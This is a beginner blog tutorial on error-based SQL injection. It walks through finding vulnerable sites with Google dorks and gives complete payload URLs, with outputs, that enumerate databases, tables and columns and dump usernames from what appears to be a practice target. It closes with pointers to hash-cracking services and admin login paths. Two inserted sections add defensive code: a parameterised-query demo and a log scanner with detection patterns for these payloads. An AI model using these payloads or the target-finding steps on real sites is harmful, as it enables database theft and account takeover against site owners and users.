Friday, April 15, 2016

Error Based SQL Injection 100% Noob! [BASIC]

!! FOR EDUCATION PURPOSES ONLY !!

I Introduction
Hey guys.. Today I'm gonna teach you error-based SQL injection!
What is the difference between Union based and Error based?
The differences between Union based and Error based are:
1) Union based is harder than Error based, I think.
2) In Union based you select all the columns and inject into the injectable column, while in Error based you make the query throw an error that dumps the information.
3) You don't need to count the vulnerable columns in Error based.


II Learning basics
So first we will learn some basics.

1) Google Dorks
What are Google dorks?
Google dorks are search operators like "inurl" and "intext" that make searching easier.

Why do we need them?
No, we don't need them. Just kidding, of course we need them to find target websites!

How do we use them?
For example, go to Google and search: " inurl:news.php?id= "
You'll see results like www.website.com/news.php?id=5

So what's next?

2) SQL
Structured Query Language (SQL) is a special-purpose programming language designed for managing data held in a relational database management system.
Reference? Of course, Wikipedia.

3) SQL Injection
SQL injection is a kind of attack where malicious input is inserted into SQL statements to drop, update, add, view etc. the contents of a database.

So after learning some basics, we will now proceed to another basic: basic SQL injection, 100% for noob learners.

III Gathering
So after learning some basics we will now gather some information.

Part 1 : Finding a target website
To find a target website, we will need to use Google dorks.
Let's google: " inurl:page.php?id= "

You can make your own dork if you want. Here are some examples:

inurl:page.php?id=19
inurl:gallery.php?id=19
inurl:view.php?id=19
inurl:article.php?id=19

inurl:buy.php?id=19

So get some targets and let's start.

Part 2 : Checking if vulnerable
After getting a target website, we will now check if it's vulnerable to SQL injection or not.
Example, this is my target : leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1

You'll add a single quote " ' " to the end of the number:
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'

If you see something like this :
  You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1

If it doesn't load normally but shows an error that doesn't look like that, I suggest checking my article about union based SQL injection.

If it loads normally, then you should get another target.

Part 3 : Getting the right comment
So after we learned how to check if it's vulnerable to error based, we will now find the right comment. Try adding " '--+ " after the ID number.
The URL will now be

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'_PAYLOAD_--+

If the page loads normally then the id is a string, but if the page loads with an error then the id is an integer, and the comment is --
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1_PAYLOAD--

In my target, the right comment is '--+
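Added illustration, not code from this tutorial or its target: a tiny SQLite stand-in for an `id=` endpoint (assumed table `news`, constructed rows) that shows why the quote test from Part 2 errors when the parameter is concatenated into the query (the "id is a string" case above, where `--` then comments the rest out), and why a parameterised statement treats the same input as plain data.

```python
import sqlite3

# Constructed stand-in for a news.php?id= backend (SQLite, not the tutorial's
# MySQL target; the quoting and comment behaviour shown here is the same in both).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)",
                     [(1, "first post"), (2, "second post")])
    return conn

def lookup_vulnerable(conn, id_param):
    """Builds the statement by string concatenation, so the request parameter
    becomes part of the SQL text. This is the 'id is a string' case of Part 3:
    the value sits inside single quotes in the query."""
    sql = "SELECT title FROM news WHERE id = '" + id_param + "'"
    return [row[0] for row in conn.execute(sql)]

def lookup_safe(conn, id_param):
    """Parameterised statement: the driver hands id_param to the database as
    data, never as SQL text, so quotes and comment markers lose their meaning."""
    rows = conn.execute("SELECT title FROM news WHERE id = ?", (id_param,))
    return [row[0] for row in rows]

def probe(conn, lookup, id_param):
    """Classify the outcome the way the tutorial reads the page:
    'ok' (loads normally), 'empty' (no row) or 'error: ...' (database error)."""
    try:
        rows = lookup(conn, id_param)
    except sqlite3.OperationalError as exc:   # syntax error from broken quoting
        return "error: " + str(exc)
    return "ok" if rows else "empty"

if __name__ == "__main__":
    db = make_db()
    # "1'--" is the URL-decoded form of the tutorial's  1'--+  (the + is a space)
    for value in ("1", "1'", "1'--"):
        print(repr(value), "concatenated:", probe(db, lookup_vulnerable, value),
              "| parameterised:", probe(db, lookup_safe, value))
```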

Part 4 : Checking the version
So let's verify that it's really vulnerable to Error Based by getting the version.
Simply add +OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1 to the payload:

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1--+

There we go, we got the version:

Duplicate entry '5.5.48-cll:1' for key 'group_key'

The version of MySQL is 5.5.48-cll.

Part 5 : Getting databases
After getting the version, we will now get the database name. This is our payload: +OR+1+GROUP+BY+CONCAT_WS(0x3a,DATABASE(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+OR+1+GROUP+BY+CONCAT_WS(0x3a,DATABASE(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1--+

And there we go! We got the database name. If you want to check for the other databases then use this payload: +AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(schema_name)+AS+CHAR),0x7e))+FROM+information_schema.schemata+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)

so the link will be

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(schema_name)+AS+CHAR),0x7e))+FROM+information_schema.schemata+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

Duplicate entry 'information_schema~1' for key 'group_key'

So the first database is information_schema.
Now increase the LIMIT in the payload by 1 to check the next database name:

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(schema_name)+AS+CHAR),0x7e))+FROM+information_schema.schemata+LIMIT+1,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

Duplicate entry 'leettime_761wHole~1' for key 'group_key'

The second database name is leettime_761wHole. Then let's check the third database:

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(schema_name)+AS+CHAR),0x7e))+FROM+information_schema.schemata+LIMIT+2,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

If the page loads normally, then the third database doesn't exist.

Part 6 : Getting tables
After getting the database names, we will now try to get the tables of that database.
The database name in my target is leettime_761wHole.

Go to http://shunz19.blogspot.com/2016/04/string-tools.html and hex-encode the database name.

Now leettime_761wHole in hex is "6c65657474696d655f37363177486f6c65"
Then add 0x at the start, so "0x6c65657474696d655f37363177486f6c65"

Our payload to get the tables is +AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=_HEXDATABASE_+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)

So our link will be

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=0x6c65657474696d655f37363177486f6c65+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

Duplicate entry 'testtable1~1' for key 'group_key'

The first table is : testtable1
Let's check for another table by increasing the limit by 1:

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=0x6c65657474696d655f37363177486f6c65+LIMIT+1,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

Duplicate entry 'userlogs~1' for key 'group_key'

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=0x6c65657474696d655f37363177486f6c65+LIMIT+2,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

Duplicate entry 'users~1' for key 'group_key'

And keep increasing the limit number to get the rest of the tables.

Part 7 : Getting columns
So after getting the databases and tables, we will now get the columns.

Our payload to get the columns is : +AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=_HEXTABLE_+AND+table_schema=_HEXDATABASE_+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)

So the hex of users is "7573657273"
and leettime_761wHole in hex is "6c65657474696d655f37363177486f6c65"
Add 0x at the start of both as well.

The URL will be

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x7573657273+AND+table_schema=0x6c65657474696d655f37363177486f6c65+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

Duplicate entry 'id~1' for key 'group_key'

The first column is id. Again, increase the limit to get the next column:

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x7573657273+AND+table_schema=0x6c65657474696d655f37363177486f6c65+LIMIT+1,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

Duplicate entry 'username~1' for key 'group_key'

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x7573657273+AND+table_schema=0x6c65657474696d655f37363177486f6c65+LIMIT+2,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

Duplicate entry 'password~1' for key 'group_key'

and again and again...

Part 8 : Dumping data
After we got the database, table and columns.. now it's time to dump the data! YAY!

Our payload to dump the data is +AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(_COLUMN_)+AS+CHAR),0x7e))+FROM+_DATABASE_._TABLE_+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)

* NOTE: YOU CANNOT GET MULTIPLE COLUMNS, LIKE username,0x3a,password . IT WILL NOT WORK *

So the URL will be

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(username)+AS+CHAR),0x7e))+FROM+leettime_761wHole.users+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

Duplicate entry 'admin~1' for key 'group_key'

Again, increase the limit by 1:

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(username)+AS+CHAR),0x7e))+FROM+leettime_761wHole.users+LIMIT+1,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

Duplicate entry 'decompiler~1' for key 'group_key'

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(username)+AS+CHAR),0x7e))+FROM+leettime_761wHole.users+LIMIT+2,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

Duplicate entry 'devilhunte~1' for key 'group_key'

and increase, then increase, then increase.
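From the defender's side, the technique walked through in Parts 4 to 8 leaves two things to look for: the request signatures (the `FLOOR(RAND(0)*2)` / `GROUP BY` construct, `information_schema` lookups, hex-encoded names) in the web server access log, and the raw `Duplicate entry ... for key 'group_key'` message being echoed in a response, which means the application exposes database errors to users. Added example, not part of the tutorial: a small scanner over a constructed Apache-style log (sample lines reuse the payloads shown above; IPs, timestamps and the `/news.php` path are made up).

```python
import re
from urllib.parse import unquote_plus

# Request signatures of the technique shown above, matched against the URL-decoded
# request (the '+' in the tutorial's payloads is a URL-encoded space).
SIGNATURES = [
    ("floor_rand0", re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I)),
    ("group_by_concat_ws", re.compile(r"group\s+by\s+concat_ws\s*\(", re.I)),
    ("information_schema", re.compile(r"information_schema\.(schemata|tables|columns)", re.I)),
    ("hex_literal", re.compile(r"\b0x[0-9a-f]{6,}\b", re.I)),  # hex-encoded names
]
# The raw MySQL error the tutorial relies on; seeing it in a response body means
# the application echoes database errors to users.
LEAK = re.compile(r"Duplicate entry '.*' for key 'group_key'")

# Constructed sample access log (Apache combined-style, not from the tutorial's target).
SAMPLE_LOG = """\
203.0.113.7 - - [15/Apr/2016:10:01:02 +0000] "GET /news.php?id=5 HTTP/1.1" 200 4312
203.0.113.7 - - [15/Apr/2016:10:01:09 +0000] "GET /news.php?id=5' HTTP/1.1" 500 221
203.0.113.7 - - [15/Apr/2016:10:01:31 +0000] "GET /news.php?id=5'+OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1--+ HTTP/1.1" 500 240
203.0.113.7 - - [15/Apr/2016:10:02:15 +0000] "GET /news.php?id=5'+AND+(SELECT+table_name+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=0x6c65657474696d655f37363177486f6c65+LIMIT+0,1)--+ HTTP/1.1" 500 245
"""

REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def decode_request(line):
    """Extract and URL-decode the request target from one log line ('' if none)."""
    m = REQUEST.search(line)
    return unquote_plus(m.group(1)) if m else ""

def scan_access_log(text):
    """Return [(line_number, [signature names])] for requests matching any signature."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        req = decode_request(line)
        matched = [name for name, rx in SIGNATURES if rx.search(req)]
        if matched:
            hits.append((n, matched))
    return hits

def leaks_db_error(body):
    """True if an HTTP response body exposes the raw duplicate-key message."""
    return LEAK.search(body) is not None

if __name__ == "__main__":
    for n, names in scan_access_log(SAMPLE_LOG):
        print(f"line {n}: {', '.join(names)}")
```

The second sample line (a lone trailing quote followed by a 500) matches no signature on its own; correlating a 500 burst with a quote in the query string from the same client is a useful additional rule, but the error leak itself is the thing to fix.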

IV Getting the login panel
So what's the point of getting the login credentials if you're not gonna use them to log in?
Some passwords are hashed, like md5, SHA1 etc.. You can crack those md5 and other hashes at md5online.com , crackstation.net ,

There are many tools to find the login panel, but the common panels are
www.website.com/admin
www.website.com/administrator
www.website.com/admin.php
www.website.com/administrator.php
www.website.com/login.php
www.website.com/cms

V Goodbye
Thank you for reading this tutorial, I hope you learned something! If you have any questions or feedback please don't hesitate to comment!
